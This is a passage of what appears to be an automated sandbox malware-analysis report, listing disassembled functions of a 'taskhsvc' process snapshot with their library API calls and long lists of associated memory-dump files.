    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 003436C7, Relevance: 30.2, APIs: 14, Strings: 3, Instructions: 411
    APIs
    • abort.MSVCRT ref: 00343742
    • abort.MSVCRT ref: 00343781
    • abort.MSVCRT ref: 003437C0
    • free.MSVCRT ref: 00343D03
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 003437FF
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
      • Part of subcall function 003430C6: __stack_chk_fail.LIBSSP-0 ref: 00343125
    • inflateInit2_.ZLIB1 ref: 00343878
    • __stack_chk_fail.LIBSSP-0 ref: 00343D21
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
    • inflate.ZLIB1 ref: 0034392C
    • inflateEnd.ZLIB1 ref: 00343960
    • inflateInit2_.ZLIB1 ref: 003439C4
      • Part of subcall function 00343174: __stack_chk_fail.LIBSSP-0(00000000), ref: 003431C5
    • inflateEnd.ZLIB1 ref: 00343C1D
    • free.MSVCRT ref: 00343C39
      • Part of subcall function 00321282: abort.MSVCRT ref: 003212DB
      • Part of subcall function 00321282: realloc.MSVCRT ref: 003212FA
      • Part of subcall function 00321282: exit.MSVCRT ref: 0032133B
      • Part of subcall function 00321282: __stack_chk_fail.LIBSSP-0 ref: 0032134E
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • inflateEnd.ZLIB1 ref: 00343CBC
    • free.MSVCRT ref: 00343CD5
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001DFEE4, Relevance: 28.5, APIs: 9, Strings: 7, Instructions: 533
    APIs
    • time.MSVCRT ref: 001DFF0D
    • abort.MSVCRT ref: 001DFF79
    • abort.MSVCRT ref: 001DFFB8
    • abort.MSVCRT ref: 001DFFFE
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 001E0149
    • abort.MSVCRT ref: 001E01AD
      • Part of subcall function 00322B81: __stack_chk_fail.LIBSSP-0 ref: 00322BBD
    • abort.MSVCRT ref: 001E02B3
      • Part of subcall function 00277B99: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,001E02F1), ref: 00277BF5
      • Part of subcall function 00277B99: __stack_chk_fail.LIBSSP-0 ref: 00277CC3
      • Part of subcall function 0031663E: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001DBB06), ref: 0031666A
      • Part of subcall function 001DC3A0: __stack_chk_fail.LIBSSP-0 ref: 001DC48E
      • Part of subcall function 0032DA95: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,002564FC), ref: 0032DAE3
      • Part of subcall function 00211E58: __stack_chk_fail.LIBSSP-0 ref: 00211F04
      • Part of subcall function 00214518: __stack_chk_fail.LIBSSP-0 ref: 00214595
      • Part of subcall function 0032D28C: abort.MSVCRT ref: 0032D2DC
      • Part of subcall function 0032D28C: __stack_chk_fail.LIBSSP-0 ref: 0032D3BB
    • __stack_chk_fail.LIBSSP-0 ref: 001E0783
      • Part of subcall function 0032E04A: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0032E0EC), ref: 0032E0B0
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 001DCFB4: __stack_chk_fail.LIBSSP-0 ref: 001DCFE5
      • Part of subcall function 0021FE5F: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0029EDC3), ref: 0021FEAF
      • Part of subcall function 0021FE5F: __stack_chk_fail.LIBSSP-0 ref: 0021FED8
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • time.MSVCRT ref: 001E075C
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4826
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4871
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F48BC
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4AD9
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4B41
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4B88
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4BDA
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4D10
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4D63
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4DF6
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4E47
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4EF1
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4F37
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4F96
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4FE8
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F5076
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F50CD
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F5636
      • Part of subcall function 001F47D0: __stack_chk_fail.LIBSSP-0 ref: 001F565A
      • Part of subcall function 00214D23: time.MSVCRT ref: 00214D47
      • Part of subcall function 00214D23: abort.MSVCRT ref: 00214D96
      • Part of subcall function 00214D23: memset.MSVCRT ref: 00214DF9
      • Part of subcall function 00214D23: __stack_chk_fail.LIBSSP-0 ref: 0021504F
      • Part of subcall function 002494EF: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00272F6B), ref: 0024951B
      • Part of subcall function 0024926C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0023D2EF), ref: 00249352
      • Part of subcall function 001F5AFF: free.MSVCRT ref: 001F5C6C
      • Part of subcall function 001F5AFF: __stack_chk_fail.LIBSSP-0 ref: 001F5C84
      • Part of subcall function 0032D6AA: abort.MSVCRT ref: 0032D700
      • Part of subcall function 0032D6AA: abort.MSVCRT ref: 0032D73F
      • Part of subcall function 0032D6AA: memset.MSVCRT ref: 0032D75A
      • Part of subcall function 0032D6AA: __stack_chk_fail.LIBSSP-0 ref: 0032D7AA
      • Part of subcall function 0032D610: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,0032E2A6), ref: 0032D666
      • Part of subcall function 0032D610: memset.MSVCRT ref: 0032D681
      • Part of subcall function 0032D610: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,0032E2A6), ref: 0032D6A3
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00326206, Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 228
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00326B1B, Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 289
    APIs
    • abort.MSVCRT ref: 00326B85
      • Part of subcall function 003159C4: _open.MSVCRT ref: 00315A44
      • Part of subcall function 003159C4: __stack_chk_fail.LIBSSP-0 ref: 00315A5A
    • strerror.MSVCRT ref: 00326BFE
    • _close.MSVCRT ref: 00326C73
    • _close.MSVCRT ref: 00326CDE
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
      • Part of subcall function 003256C9: _read.MSVCRT ref: 0032577A
      • Part of subcall function 003256C9: __stack_chk_fail.LIBSSP-0 ref: 003257B4
    • strerror.MSVCRT ref: 00326D57
    • free.MSVCRT ref: 00326D9F
    • _close.MSVCRT ref: 00326DB1
    • strchr.MSVCRT ref: 00326DED
      • Part of subcall function 00322124: strchr.MSVCRT ref: 0032215B
      • Part of subcall function 00322124: __stack_chk_fail.LIBSSP-0 ref: 0032219D
    • strlen.MSVCRT ref: 00326E4C
    • __stack_chk_fail.LIBSSP-0 ref: 00326F50
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • free.MSVCRT ref: 00326EEB
    • _close.MSVCRT ref: 00326EFD
    • _close.MSVCRT ref: 00326F1D
    • memcpy.MSVCRT ref: 00326F3D
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001C73E6, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 153
    APIs
    • strcmp.MSVCRT ref: 001C7403
    • strcmp.MSVCRT ref: 001C741F
    • strcmp.MSVCRT ref: 001C7445
    • strcmp.MSVCRT ref: 001C7465
    • strcmp.MSVCRT ref: 001C7485
    • strcmp.MSVCRT ref: 001C74A1
    • strcmp.MSVCRT ref: 001C74BD
    • strcmp.MSVCRT ref: 001C74D9
    • strcmp.MSVCRT ref: 001C74F5
      • Part of subcall function 002E40B6: free.MSVCRT ref: 002E40F9
      • Part of subcall function 002E40B6: free.MSVCRT ref: 002E4122
      • Part of subcall function 002E40B6: free.MSVCRT ref: 002E4145
      • Part of subcall function 002E40B6: __stack_chk_fail.LIBSSP-0 ref: 002E4167
    • __stack_chk_fail.LIBSSP-0 ref: 001C77A4
      • Part of subcall function 00314127: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001C7567), ref: 003141A3
      • Part of subcall function 00314127: _fileno.MSVCRT ref: 003141BF
      • Part of subcall function 00314127: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,001C7567), ref: 003141EF
      • Part of subcall function 00314127: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001C7567), ref: 00314244
      • Part of subcall function 00314127: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,001C7567), ref: 00314261
      • Part of subcall function 0021FAAB: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CA76C), ref: 0021FB18
      • Part of subcall function 00343078: zlibVersion.ZLIB1 ref: 00343088
      • Part of subcall function 00343078: __stack_chk_fail.LIBSSP-0 ref: 00343098
      • Part of subcall function 00335D43: SSLeay_version.LIBEAY32 ref: 00335D63
      • Part of subcall function 00335D43: __stack_chk_fail.LIBSSP-0 ref: 00335D8B
      • Part of subcall function 003EC348: event_get_version.LIBEVENT-2-0-5 ref: 003EC358
      • Part of subcall function 003EC348: __stack_chk_fail.LIBSSP-0 ref: 003EC368
      • Part of subcall function 003188BE: memset.MSVCRT ref: 00318901
      • Part of subcall function 003188BE: __stack_chk_fail.LIBSSP-0 ref: 00318B19
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • strstr.MSVCRT ref: 001C761B
    • strstr.MSVCRT ref: 001C7635
      • Part of subcall function 00319204: WSAStartup.WS2_32 ref: 0031922D
      • Part of subcall function 00319204: __stack_chk_fail.LIBSSP-0 ref: 00319286
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
